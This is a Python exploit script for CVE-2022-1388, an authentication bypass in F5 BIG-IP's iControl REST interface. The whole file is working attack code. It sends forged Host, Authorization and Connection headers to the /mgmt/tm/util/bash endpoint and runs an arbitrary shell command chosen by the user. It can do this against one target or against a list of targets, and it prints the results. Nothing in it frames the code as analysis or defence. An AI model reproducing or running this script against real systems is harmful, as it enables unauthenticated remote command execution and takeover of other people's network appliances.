CVE-2022-1388.py

#!/usr/bin/env python3
import argparse, requests, urllib3
from termcolor import colored
import concurrent.futures
urllib3.disable_warnings()


def exploit(target, command):

    try:

        url = f'https://{target}/mgmt/tm/util/bash'
        headers = {
            'Host': '127.0.0.1',
            'Authorization': 'Basic YWRtaW46',
            'X-F5-Auth-Token': '0',        
            'Connection': 'X-F5-Auth-Token',
            'Content-Type': 'application/json'
        }

        j = {'command':'run','utilCmdArgs':'-c "{0}"'.format(command)}
        r = requests.post(url, headers=headers, json=j, verify=False, timeout=5)
        
        if ( r.status_code != 204 and r.headers['content-type'].strip().startswith('application/json')):
            print(target + '\t> ' + r.json()['commandResult'].strip())

        else:
            print(colored('Target is not vulnerable', "yellow", attrs=['bold']))


    except Exception as e:
        print(colored(e, "yellow", attrs=['bold']))


if __name__ == "__main__":


    ## parse argument
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='The IP address of the target, eg: 127.0.0.1:80', default=False)
    parser.add_argument("-l", "--list", action="store", help="Target urls saperated with new line", default=False)
    parser.add_argument('-c', '--command', help='The command to execute, eg: id', default='id')
    args = parser.parse_args()

    if args.target is not False:
        
        exploit(args.target, args.command) 
    
    elif args.list is not False:
                
        with open(args.list) as targets:
            
            for target in targets:
                target = target.rstrip()
                exploit(target, args.command) 

    else:

        parser.print_help()
        parser.exit()